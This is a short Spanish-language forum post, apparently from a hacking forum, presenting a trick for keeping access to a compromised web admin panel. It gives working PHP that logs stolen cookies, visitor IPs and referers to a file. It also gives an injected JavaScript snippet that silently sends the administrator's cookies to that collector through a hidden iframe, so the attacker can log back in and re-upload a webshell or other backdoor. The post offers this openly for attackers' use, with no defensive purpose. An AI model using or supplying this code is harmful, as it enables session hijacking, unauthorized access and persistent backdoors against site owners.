Buenas voy a ir directo al grano, este pequeño post no es un tutorial, es un truco el cual se me ha dado gracias a la imaginación y por averiguar, lo que no quiere decir que el método lo haya creado yo.

Se trata de asegurar nuestro acceso a un panel de administración vulnerable inyectando un script en js para robarle las cookies al administrador cada vez que acceda, para así, una vez obtenida las cookies usarlas y entrar para volver a subir nuestra webshell u otro backdoor que queramos subir al servidor.


El código php que he usado para robar las respectivas cookies es este:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>

El script que llamaba al documento cookie es:

<script language="JavaScript">
document.write('<iframe src="http://127.0.0.1/?c='+document.cookie+'" width="0" height="0" style="display: none;"></iframe>');
</script>


Vídeo demo: